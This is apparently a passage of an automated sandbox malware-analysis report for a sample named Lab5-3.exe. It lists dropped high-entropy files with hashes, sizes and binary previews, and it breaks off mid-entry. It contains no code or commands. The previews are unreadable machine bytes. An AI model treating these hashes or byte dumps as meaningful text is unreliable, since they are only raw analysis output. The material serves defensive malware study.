                                                                                                          SHA-512:660192BCDFF3F7B79FE6C4E2C0136A241F6E0A577CFD9EB7EF5447B45C2BA33622B9B02021C7764D8032FBBC46F71E7C2F6B5D4E375C4EFC36A23F14D844DA49
                                                                                                          Malicious:false
                                                                                                          Preview::~..{3e `3...l...I..mR...C..M.....O+...=+.*.~.......r.....=..n[v.0..(.`=.?3zV*.....0[.=....t..c........K....t2.....3*..F..L.5..;...m.'..{u.@X.............<...B.2)Hea0n...^y..R.V./CU.rl*hUu...8....3.F%.4..I..;.#.Vb.:......N..^P...8#...xX..fS...y..h......Lm~........-.."...d.....h....,..Ni?$.......@....8.p.O.....Tg..u.D...4.*..|8.....3.Z.{..N...C.p8dj.e.......D%R.....l ^.`.......e.D..........qq.H0...3G....W...u.Wp..[......9...c..0T;...v..R...g.ry....Ems.^...B.JG.........sN.......f.Y`..V.e..QI.B#\...E...../.mPR.....@.......}68......1....O].h...(C...b/...k.D.(.....E...P..L.Q.}......s2.....,.........i...<......A.F......NGD2...z.6I...u..u*3..2.|.@...5O.=_.]..q..-EZ..r...H..;y...H..x1.V.V.V......6(:> qr."R8O%`-...o%....5.......P......`;Ra....o.T..1.....F.:.`t.H.....dNO>.^.[?.C%..~<.B....*..]....7.BS...1.+?3.f.uT..o._?..)..T3.........B..F(.y9fo.t.Xz.w$ZS.*.`....6..W...5....H .$...?..qAG.#.....(.ov.>...f..._hs.n|...W. ...l4.I....fpZr.[..<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4224
                                                                                                          Entropy (8bit):7.956024600306194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QBQNYF09jWI4CCIYSzNmaMJYIjS9zyCgGx0uKeY2ElUJ:A7+AUCIlzNm1HSzys0Cb
                                                                                                          MD5:ADF83B0216C593C4A53EC87592A17BD6
                                                                                                          SHA1:A406E53E4F2446B66B267FB4B444830AAFCD051C
                                                                                                          SHA-256:6A5B95E395EF5F96C5E1BD55E607019068C49928DA6A4CE58A5165DE07D82ED0
                                                                                                          SHA-512:EE66D1FEED84A36B39BA17667A65F0A7E20CAD7989DAC8530EEC87709917948E09D8A72F152933312D093FB732CAAA08898CDDAC22CF1BFE1F6106D2C98BFCF2
                                                                                                          Malicious:false
                                                                                                          Preview:.X..]OV....s...W.ln.5...... .j.c\J;d.Y...).J+.*H*..h!.m...........@.1..G..cjJ....M..i.....f..d.*V.....8............S..F.C..I....dP|W`...:...M. .......s.K.@.Z......._ .!A)G..4n.x.2...... ...\BKgq.....u.N....9.>k.).b.v.....X......Qq...y..5').!...YP...FZ.U......G.)pxU..)e.`.0..d.'.>......nU..|W.F}A.\.N.&TJg6.tB"~.X..3......;9..J..x.u...iL+..$%V'%x!........k.".......7....tl..o$i.o.......K,.I..4Q.........76..F+.l...q.Y...%...pc...N.../..0.$,...@r. ...s$...'.cd...?.....,P.-.....4W..u:R.mo...j\..\.nZ4........M.^'.I....>......q.....~.>..4P9._$#A.E .[........?.c..=.U.W.p....da....~i.j..4c.!K...C..%..L..;.u........@/.q.L.oEP......;DD.....g...lQ..M.(..|...t in.i~<.*...E....5...Os.U..|..C...:.....il..S..U=6/...5b..#du..d..tDd..a'k.4..u..a..;].-g.............@/$f..G...$.y.......ZpC0KZi.b;.n...J.0....y1v.......>e7.2...(7...K..^.$.nl...2.^6...A~..Y.`....+=K.......n9...La&.{.X-.xn...^8.F...}..E.A.;>.<0.<.g..D....^.....?..[jZ..i..,.}}.......Z.P..:c.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.9521363385174935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LL7J7a7QXy8GtwlwW0AWn5fVBBAgskl26RX7hOzGx0uKeY2ElUJ:LL7HXyn2w/AWn5fVBBfRX7hT0Cb
                                                                                                          MD5:F36551F45AD8176B0CDB7422D97A3AE1
                                                                                                          SHA1:970E54B50397FBF9187CA42A711DF540FC486011
                                                                                                          SHA-256:D9933B60173F656E5054663261F27A76EC4CF2543BEE5420FE2852B152559FD0
                                                                                                          SHA-512:781D59A3719DD4CAA73B5AC384772F5F74DF28332E95469ECE9B8B6350AE21F63E77F68B5C5F10C528C991227D1F83A0C897EF678323A5C14D08E174FAC310A2
                                                                                                          Malicious:false
                                                                                                          Preview:f.a...T/.......f..`.k.{..V...2.(S..Ar...}v..O...s\......?.........;...4[s.....*:k........D.".4.f...........:dP....-......~...c..q1..RO..p..O-bWo`Ab....;.Y..zV%\..+#/._).c&...........7....w.....K{..^..-..G.X..0k.e._.\....,...o.T.R.d.7..Q[oD.o?......~&...NecY.O4.!,].Fn.].. ....9.z......]V...R..B...8.&..]......=._.....G..8..{."3.Gcm...g..H.'=.P.("......`...%n...7M.2......V.:.O.Ne.7.ak.3.i...'.7.+...K\.R...h.Q#..?:......I._..4.R..Ww$...\..K.AJ.28.p..;4X.2t.u..2..T.=....}8i..(].J.Y.iU$.V..h/Z...n...(.m....9!.-....}....8...k.U.8X..<j....D.3'.$5qV7lh.F.......3bM.t.*K".'}.z...FE..eB.......L83..2.f.F.>;.....A.~&R..Tu8...J.....buH.<g..mw1.......E..|.....m.+.k..d...IJ1.jq...a.P..".FV.%..j........!|".T 9..P.........e,.P.n.....9AT<.t'.J..J..f.}.6.1,.......,t..M.^y.k1c.3.....+...<.@0.....+.o@..'.^.,...m.......<............E..+.../..B...&+=.............1..=.).V.kgA.+.6g.\v.f....|...<..L+"u.7En....J...eU.nI.I.Z.........ETd.90M..7......Q.I.}.V..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.888010226623353
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0tVphMLGleNUrB8MHfUTid3hBaUoSGFcmeykEdEElU92i:0txgGoUNQGx0uKeY2ElUJ
                                                                                                          MD5:42ADCE263ADE2BF87473517330DC3A18
                                                                                                          SHA1:28D73D19F30FF3BDE04D61F2D4A446E8C5C38965
                                                                                                          SHA-256:FD250CF40C70A1B96C937D462CC760F943C4E3D94D10F49297C6D6655C24B3FB
                                                                                                          SHA-512:3A18020B437D9802E0D996F966875BDD5E03FD02BE19336D5E796898A335E120EEF10FFDFBD5660145A596FF2912C90604B748BB6CFDEDB520CB2EB7E5BCF1F9
                                                                                                          Malicious:false
                                                                                                          Preview:p......y..}....N...-O....x..j.xo.L9(|.%s...H.n...d].)V.-.3.'.{....~..I.6..8QA3.....#.?..,f....u.pM...2.I.:.w*R..N..]{O.....L.l.....-.R$E.+g.l......*'.r."........9^.J.GV.......7.c.$.Q.......x@X.).L.L7.;.\*xW...-..j...........cJ9.Ju......z.F.sYG^.IBH..#)/>.:........Y...b..9...!J9S.=.>.z.o83...........=...K.:...M6.k..!h...~i.+w.."..x.hU.......E4wW{\...T..b.b`..y. F.F...HY.G...^...".IL.....`.S.D...*N....^..`b.a.....o.....7/......~f...$..a.(.6}..-jwZ.o.A....DH.q...~Z.VX..x.j..t.U{..{.F.IU..{.........H ..#3~bD.Up#u^+.....}u.......y...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.8983934229940775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pOfl8HemEEs0rwV/XiHfUTid3hBaUoSGFcmeykEdEElU92i:oJDEs0kxdGx0uKeY2ElUJ
                                                                                                          MD5:EED0DF1AA772D683596EC8AD367F409C
                                                                                                          SHA1:04E621E694081578696F029EA1E3E8F0B2217703
                                                                                                          SHA-256:794F30D5EC20C173EA6CAE956641273888B1CC98949043B7901C3F1D6552A025
                                                                                                          SHA-512:9CF29240B335FE541BEF459BF9590101EDDB060EA9E5CCB5CBCF689D9661067A9C32B70B47AE9A9563FA7E15282F6E29BF78D88D00790D7DB018F88D5D1845EE
                                                                                                          Malicious:false
                                                                                                          Preview:.....U+._...fGTh.t2.?..z.2nm?.{=..Y.1a.G.Dzx...~;-....V..Px.9\.s...4.M.V~3..?..-{:.N.....p......^n...+.8\.2.....=.s..6s....Ffz.....\.....:.!F3....U..'.N... r..}. ....j.A....m.....`q.8r....b..PP........5..d.....|...B..7UA....YD.....6.H.......i..?.....;P...l,Qx9%X.l....?.E..K.A...G..Q...Y0m-...]..{.M;.WLpv....((.....v....O..f./....>.?=<..;6c9..r..:x3a\.A.#.S02..e..y.QNW^...7r.......)D..[...~Mpo..=...bZ...Jx...&...!Q\....?D.(.5j[.w.$[b.2.HG.|.%...w..:]U..&)(.>.."~.=!.h.|F..3[..b.[t....._Z.=..6..'2. ..xGc.qQ].A..L...CB.}....K.N.\(.....o..=NNe.,A_.8....9..V...%O......%...o;ZIMF...5.....H.S...#..zj_.T,N,....._...18..g...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.929495525726026
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:927HLv3MkNPPbiGK2GeDobS4kZmsHfUTid3hBaUoSGFcmeykEdEElU92i:47rnNPPbiGKK8G4hrGx0uKeY2ElUJ
                                                                                                          MD5:4593A454A266B8E4375763AD67AFA28D
                                                                                                          SHA1:227F6C97F888687813FBC01ECB891B8922B7F210
                                                                                                          SHA-256:649B9564F8A5D0A746B3DCC46457D4E543652B9C66FC18480A2011FF231A97C0
                                                                                                          SHA-512:FCB75E64B66496D337F8CF319E43531C2D4D319EA76C40FFD9A98FA2541006C82D0F9EB87BEBCC74C22CEBBCB02558166AC0E6DC4E99235F0CE8C7E9B7EA0696
                                                                                                          Malicious:false
                                                                                                          Preview:1YX....@..^...~".2.}.r.x.+...E..5u\VU.6iR<...S..../..-..w|.r...g{|..-nC......2h........3..D...,.O..X|..4u..Q...nE..ib.s&.c0...j.!gS.(..d.`Dz]z.2..5...zX.ns........:..xW.`.`rH.U.0.>.hD..%_Hr..]m.d@.^.JX....qh..Q.-K..U9..Uye....T.>.S...A.H.........mi. .n....{B...R.........N.......O.S7.NR.gw@.P......D./.)...Y..E.yX...B.{.MQ.#n......Loi..2.n.Q..;.v1>G{..0.'.6L.....m.z-..P.)....=!........RZ|.......m....6..p.IF5.S...a.#.Z....F..2.v.M.5.F.'.....-.L*.n.&.3..U8h......a....)......D..N..."e`....M...d...V.."'...I..5r...Kw.K9.$....l)_X.......~...W.g.P.(...G6I{h.g.l..1..d.L4.:.aa?28GI._M}...f.%H8a.Q1T.f.'._T..@.....9......|.l..Vr...l..>..=^!.NRT!....(4.7..a...?..n....E....Y..,..Y..:.;.(.H."yF...Xk.7B..v..#N.i?z.7..k.k5..Q.X...@.I..\.G.....'.G.G..I'...A.c\....s.h.L-..w..z.(3m..Vt.....3y"l....<..[..aT[.Z.[39q[..'..?....:jV.L.5..4aY..+A.l....A....o....i..R..H2.u....c...,6....v....{.&..B..*.5.,.Q..[.U.k/54.p{(..Q.D...N..@v.{.Y<*.....Y..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.919770907156781
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KvFqia4BZixO9Rj6+aSD2/HfUTid3hBaUoSGFcmeykEdEElU92i:Kvoia4Lm+aSD1Gx0uKeY2ElUJ
                                                                                                          MD5:201589AEB97FF23F9231A9CA67B1B862
                                                                                                          SHA1:643ADBEF78CE9A9756BF2967BDB79171675D928E
                                                                                                          SHA-256:65B14B0FBDD07691DA54C159CC813865C722076C7799EE453951DDE816742BBE
                                                                                                          SHA-512:7CCECE1BA483E4A37F5F1C9A571C0F4B26B754D58EE087BCF63A21BCDBC49DA2A9E2AA6A9DBCF29393A92E9C0E089BE9CE8A84A7949FC20A4B102CAEF2A4FEAF
                                                                                                          Malicious:false
                                                                                                          Preview:..B..i.i....$._....`}a .g.I.`B.....a.G{../....~..Q.].$PX.;.....G....|......`..~ tx...k.,...}.%v..+>....|..*.re.M.{/w....<).jI.(...|...=OE..m..9_.b....Z..`.<G.(.H..'.=z......o1...k...Hk.(..+...,?.i3..e....a-l.0.m.7......^..U..k....{.}1s.X..L<=.q..^......._..........<\...{..W.IZ..2...|......|..V......I.x.....3. !c.l."..2.....u....;duV......e.."2.....&.K#../.}._.._....R.nZ.l<.*...."..D.H\.(.....dc...C..uEI........3..:Y.s.t...ZO.....+..7.v...qx...;.'......!..9).......?..d.D-..]6...P<.h...._.g....fO..:..S.....]..K.n...&:..n..&.X.G....T'~.HM......BU....b.b.D..u.5..T........H:.k........!UkkD>.D..hQ....+.~.>.".Cz..e...z0Z.h.......#.....1.}...."+i....t=..\.t.]..%.....$V.O.%....d...........;......0h0..!C.M.@_vw......6].....Q.L..ix.e(...p.*..+i.<."p}....=T.2.Xv;23...z+L.lm...A@rg!jr.$L..pmsEg&To...5..".X..H]Su[........6.9d3....]D;.....j...h.....'/..]..rUG.B...m.,../.v.?......p.....AX>B.lG../8.E.@.8y.....}O.d...]~.]....K.c.6..s...-.d.Hp.p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.919304138781674
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZWhjQtwQLK7bFazHsAocHfUTid3hBaUoSGFcmeykEdEElU92i:ZWhEtwQ1MbGx0uKeY2ElUJ
                                                                                                          MD5:6626F30AD2BFE010904B9D2B655E4F07
                                                                                                          SHA1:02E7B5A7C12EAB8C49EF5C2C0A83BD93EA3A0A8C
                                                                                                          SHA-256:CFF5722EE807180C10D180782969B1910464F1C04E36BA9A2DD267A6940119F7
                                                                                                          SHA-512:2C4D333396B1DC6E64D97B97818259091D704B59AA356B5CF03D048405C105A39CBB5F6A42E4CEC327A10F43468B277E3F5D61033C75011357E4EB6B9CF10B0F
                                                                                                          Malicious:false
                                                                                                          Preview:.....M.D....!........Z.[......Z[N..h...1.7.z.c....;S4.JP..M..~.+TR......./......O.H...!..I./..-l....AT...}..j8.!....:Z.....[>h 4....c&....i...-..i..m..CU1~.n..xjo..K...o...l1.}.|c(Ao....rj.....U(/Xg.6../+.....[..u.{..DHJc.9...+..7..ADb....:.....*....G........Q..U....v....EE]R ..J..vO}.~,q..n3(b$a*,]f%.].qO..Mk......R..S&.=..;&|.)..u.....&....F.y.Z.n...N.=Y.L..E.eF1.....w..)6....)"....~j.&..*....[..9o.n4..].N...\3.....R......,O.2r1...]...v.....=3.....D..&..._.S.#.....i....c....NS.d.Ij.1.......!.zCA.Ca...ox..]....a...od.|...?.F.z._r&,.p~q[.....q..E.=..xDm.D...0...KPI.c.@.;.%.E...(.+......]..5...D....).5..i.n...0|E.#d.)..m.V.B7.;Zv.=......f..f'.V.7.fP.k8.W.. ..aQA.~Bi]>."Y..R..2x.....E..wM.4.e....7|a...@.h......-.r...1V#.B..HJPL@..FZ.....FZoB.-..Y."..,...V.E..e.C...9.Xr\k7..."...^..G%...*.-....!...#..%3.go......[[.yzC..../.-...!<.3X.3.39...n.......iE..H.k......l...z^.2....4.N[TF.+..V.....T...,.....W...q..q5..Ds....(.....!...0.YB..r....2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.943843534274532
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9W+kzQgbmcuPr8V9A/O2Y/Gx0uKeY2ElUJ:im7r8V67Y80Cb
                                                                                                          MD5:1CBB5C692EA7163E8250114BEDF98BC0
                                                                                                          SHA1:F16B6E55C5D309C895C3729C9961D9BBB93CE2D1
                                                                                                          SHA-256:5D5F88CB70002284B1608A6C063EBC86C935314A635B553888004428CAD9D460
                                                                                                          SHA-512:24D68701B33A31D88315859FB336E27313C33FEE04EC56084E2CAD32628F04D910AC665EA0105D78ACBDBAA158FBD95138D14CD05ACC87404DD85C42FBF7397C
                                                                                                          Malicious:false
                                                                                                          Preview:..pO .{p...k.sW...r.y:.....;r....N........sc.......`....8.v.V.d......=..I....+g..0.;7%.....f..S..........!..<.{.Q.....c......].o5.k.....].G?.2x..{T.\.t......"7..S..|.Ew..oI..Mzy.......9h...).$6..sk.Jf......c...0.bBO?.|.\..Or\.t.S0"qn....cT..u...z....>.....&..4.j.^XK4o=.^.CH.Q..lbt....'...N.nlM...r.?.).L..I..h..U...3.....uUky.4.$S...x..@.....<.l.M...$*.....|B.t.O.=..>H..2.S.h..K..1...D.TT`.[g.47G..O...u..6.U\.o.d/.o.`.r=.d.V.Q.`..Uq"!.^Z.sjZM.\. y.E...F..q+.Y.g....kk....!.kec..8..q.{b.....C...&... .#K.0s....TBTL..M.......@..~.....O..L.... .?..=4_...)p......?......U.~..[\..D.z. ..Q.w.3lZ .?b.}......l,.gk..g.F.<.jG..DN..G6.B.}...@..$..`.da.:.)9U.z,.PM.G$...x4t...[2..~N..b...U.......B..C..Z....kg.....M..8u>G...,..XG.5.j"\....q....Y.]@.......U.....6....m.tO92w..-.......zM..&...Z..v..--i..a..@.....JK...p....S.{..n.g...5.F....+F...n..T....'~H..b.W-z...7.H=\M/f..3..u.=..~R..s.R....R)..U.S...c`.^Mu.*em...#..e.....Q(..o0|..e......6.H......\LiG|.%.@i.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.9357113693427195
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9z3fwcnr9vX7+jpU0i9axNlZTyBaTGlahCuAkGNxHfUTid3hBaUoSGFcmeykEdEb:9j/r9P6MaltfTGl+RgyGx0uKeY2ElUJ
                                                                                                          MD5:A75AF2B93442E703F94EB06BD4725025
                                                                                                          SHA1:B1874A22BF605B6637C90CCC561E083225EBE141
                                                                                                          SHA-256:B53E8C58A10792A9511375A3220B226FC907D8F5895B8E2971B16E221175FAAA
                                                                                                          SHA-512:D40EF28CF2313A3CFA9248288DF56AEAD53FC9BA5EEE55C83F2F475E532F2F29852F1DC3D71F845450FDDAF05CD8F754DA8078424AD76EFD88A0DAD87870E0B3
                                                                                                          Malicious:false
                                                                                                          Preview:....R.C.. ...9H...!Y.@%y....+z6...e..j.E..I.7...<@F..;}(...]{wF..c...._H......t.......d........F.}8..s..e..Iu.`o<@CG>e.2..^U.y..w&..1#..M.y.N.?..j..G...t..........9...Z..1.M[..F......;..+..M.<?D.......)....3Uyn.~.r.^s.4M]...hR\.....Cw.'Al.....jm~e..../..%.]t.D..U,.GV.w .J.......-.c.M9..H@^S..|lyt..l...0...........F...O.zS.F.*KFGR~......1.h..!4...{..z$..m....U.8......x.......R.:.{1..&..Uu.....pUB.%r.A.I...l..v.A.%M......i..}...I>...[.......*.}1.nJ.z.-aJ....$....i>..z....o8g-e......^..p.....5p.F.l....&.,........f..7[i.G...y.\.h[..^..w...........P9Z3c...>..f.......%p.....{;X..?9...qN..sb0v.M....k.f g#.eZC2:...6....V.....}..~.+..~q]vC!,Gq.......p..g..,.....lo..U?...R2~....Z0..7....^?..<}.n[/9@|..Z.O.%.G.E.(3p.\s..WF.....?..U..,.=b.........{..o4..Oc.7....7..J8f......{...a...\...ez.H5.....YVb_...'}O....o^./..>R+%.Y..U .{.6%8.d.....G.E..e:...?.Mi....l.<..j..r.S.).l..~.......gLg~.B<..%.-.a..!;B2...Z...8}/...$..5lz.).0b."k..Z.n8.VI....1/.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4256
                                                                                                          Entropy (8bit):7.9546375163258
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:W4jMjo3ki2NbJFWaGnTJjWcSdS7bA1Gx0uKeY2ElUJ:WMMjo3kRlCnV10Cb
                                                                                                          MD5:09B5DBDB17156F574962C08E482E3022
                                                                                                          SHA1:A8C59EF3D2A4257F9CFDC9A5B02BCAD08C6C3CFE
                                                                                                          SHA-256:1204C3B3DD7B0843F8EA2B6395F4FA960E43CFECB80E2D0BD72A9F3610AD7C80
                                                                                                          SHA-512:E4EFD808243BC1FE202B6C82029B9E6289D7F403907F4A533DA0AF7689775AAE8A2AE25A8010053907CCCD56D79D46F615B2C2F18EAD4A87655479A3BFDFEC64
                                                                                                          Malicious:false
                                                                                                          Preview:....h..r...'....4.....oN.V..!..n.=.#y44...R.}...8.>.o..UoD....(.mp...kf..zV7...;.wC....71A.Hwl......i2.Y.|.....f+...........Q..:Q.r2q...........A..@n.eW..L.A...V......*......n..?.%V......K...T5....-%.pmi..w...8.bN,...N.w7.$.8.Q..>..*.3.jb.....<..s#..H....m'.)l.K.M..).K...........x`. ..m."...ku.......(D+S}...m8.D..#....,..,......3.T.....a ../.Y@...?5G_..c.I........R.P.i.$....i....)..s.9.Y2.Y..q}X..&..G...5..p.Q......"..Z,...H..b..T.P..|C.&..m.]..p>.a-7.A....,l'k..|I+.X...u...>?.B....jp.K\+.....M.w..E...d.5..L.....O._....7.C .......!>.\...X".3.M...i..d..S.un..v.....v;.M..S.!>..x..2..w.....Z).y.....G.....B>.2..2......LeU'.>.#Z....)..\0P..7x....0.{^.."....F.....F..]=LP>....0..Uw..\...._P.....e..U.g.Cb...p..X."....C..L.z.[..m..CE.\.U ...=.........p.."...`H3.d^..".....%Y]Y...x.^..B;,......<....U2.e..u....T:PCh.[..~@...FC..].{.z.y...T;....p....x.>.xwo.......Hj.P...$b.nJu_q................8O...,....($.L.p...s.n=..4.07......G...w}p....V.gt2...5d.8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4224
                                                                                                          Entropy (8bit):7.951016361246284
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:73s1uQCGgP0ucM8oRp2wF22sGx0uKeY2ElUJ:73s1uVP0MbP0Cb
                                                                                                          MD5:FD6842F198B6A75E35E8ECEF0802668E
                                                                                                          SHA1:64AC256D70D3D7569140A12E9B52D72875FD6A4B
                                                                                                          SHA-256:DF7E5B53E4344BEA0145C3492C0579908954EA61D8B6EAC27FE1824F677ADAFF
                                                                                                          SHA-512:A1D28BD18C9C5CEED5736573E391CE339B0178228FD165CA1BA405F2E4853E8EE3D25A6AEFF459AC9B23E329F404636120BBFC19B4BDB512A7425D1F2E323E3C
                                                                                                          Malicious:false
                                                                                                          Preview:...e.M3..Q4^.=..e\.....@V..5.F.|.....h].n.Q_B9vS??nCs-.DD0.....] "",d....9.4.u..(.,.....BPD!.Af)X]...........d..@..._....)......wx...b..H!...f.=.iGt.......2..x*Z.v...f$88...#Ee.N.S.*...`...|...M..u..|G(.~Z..El..7{..=..j"<....U.K.....>J..}/.....,n:.`..r+..y-.g.....:...&.@...vj.w.>..wq0....H.E`..%...X...............$.T..6..~y.k.e..6.<fF.D..2.Dp...#s..\.tq........c.;..Z.N.....z.L:..N=....v.....G..$..k......<..h.2./|....N.....w...FH.g......-.s{.......lc.o..VD......@D..a"...G..7......<.nsS.......ee......1i.......x..@.6...4.)f....q...<.{AfJ?...L.s.;..U...0.E6T;2.]O./....V.........>\bC......l........)....;y..0..,.o.0....Xw.ZVR<..f..'...[.R\.Z,#..K.a....,...Z.....5}.l..H...........d.h...T.[..w....V..?M..8.......V.3..f..2#8....{..1]..&..l.'.Du.g..{(....0..=.\..p..I..#..h..%....j.^3...L....Z.{....{....tB.b..T.[Q(...6..Y...H..:..).ZE..6..E'..|n.d.k%*../..........B,..<...~;..#..\Fu......;...].JWza8 ..9.JF.T..CJ.k1D..gZ..Mu...4.B.h.i.f7z.L......*....X.E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.956763437570094
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:2pzvlO3hDmUBEE5n+zDnWYYY09uWIvJGx0uKeY2ElUJ:gz43hDmU9xsSLK60Cb
                                                                                                          MD5:376E9F4A342D490075B620E3D75FB383
                                                                                                          SHA1:505BCC560C57E5436DE55801E1093C20B2065931
                                                                                                          SHA-256:9524DCB27792C6CB19FF1FA4D8DAB52AE0863D5C60035F9867F8B4EE29FF5695
                                                                                                          SHA-512:B6B6627794939C3980058626E6780FD7AF76676BEFFB1412E7DC3D83AA75A43B04876CCAC757CA72900690FE9AE63B7DB470FEB1E5576A8C1887113A88F872D0
                                                                                                          Malicious:false
                                                                                                          Preview:M..;.Q.El.#.o.K&./..78i..$.+t >.^.Kj\w.GCk.c:o.5.Q....!.P.Y...=..h...........wmt.$._.J.|.E....zmEr..&.c....T.....;$Cq.C...`...s....|.E.......(.\.7......'.a....3.C`ND.m~.0..#a..go...3f}.6......TYK...Qn.g.*.l.2.....S....}.{.....mn'.(..#p.p..`.q*C..~.........#.o......B.D...{.X....v|u@9JS..r.FV.........f...y.{{p%L..u.dW.D..y>....jWiz.^x...3.y.#r....!..;../..+_D\~..A..5...3...2.~K..`[.zJ.....6_.....$`..f...V..va..J.AH.r^K.-....V..C%..?e....e.i@....a...../.......B.7.o.@z..Tt..e.5C.....B.@..........5a.p...g.A.u!.:N...*...3........Wo...=.y$.["\7_..k..D.{.7l1 ..n....o.6......o..%G..o#......N.Y.J..q..1p$....z=........,."~M#o.........:....2......1%......r........p.}B81....$.........xzjW.8.gTM.ex..r_.R....az..d.'.Wd.{.l..6...RL.C..eZ....(...YX..&)..0/..N."T....-..g.tF.4.Q..d<`.#-K;.c}5...I...r..2.I..Z.>l..w.KN.&..f...O.%d..UB........f....g"...-.E.:',..d...V.[..m...9r.s(.g...On#.#...^.k#.H.."Z...Q.`4..(...-.H........F.0T...I>];O..Tx..R./_...#.e|...n|.v1....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.886963599860564
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OAysJ5SDIrW2jhUBwHfUTid3hBaUoSGFcmeykEdEElU92i:gs3SDajhY3Gx0uKeY2ElUJ
                                                                                                          MD5:CB7938AED0B0728ABC377FD4149E8355
                                                                                                          SHA1:7768007CCE46629B7358F0C3B1450779219B964B
                                                                                                          SHA-256:B4000A6CFCD9A21A849B9C947DB82FDAA4C9C522F7C3D9716A046C63CF67A020
                                                                                                          SHA-512:93B724DE1BCDD5CF285184EC580B0EFCDF88DEE8F1E707D563D340DE91769C1F45A563BF4EF8BB6E59D27E95334EE6787DB4624D192D56CD89A3E1F6C14BB89F
                                                                                                          Malicious:false
                                                                                                          Preview:/..f.Q..*..O+..'...ML..^....3.....D.}..EB.....9S..qX.........y@s.w.L8.Bc....vb..z1.m%.".&..`=v...cV(Z..Q......B.=I..1.d.zthhV..B..._.{.".17..(.zv.....XX.2p......v...Q..[.wgB./..c...!=...O.E.}...^..O.-....3..t.$.q&%.).......<.J|..9...k=;r.b......a...`.V...6.+e..XE|3.@...(eN.]....,.E..?....".U.S.....%...^.t.v..R.....e?...[b......S....._i..1/fU...8........M.....!..eB.....CEA.H...J......Suzr.Ho@......4..]>......2..+.........D...z..T++...!^...b0PV..-..y..n.^oY../.6 .5...q.0...y{.m.....q...x...R......f.4.Mv.G...|../.+..\%.B....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.895617298432414
                                                                                                          Encrypted:false
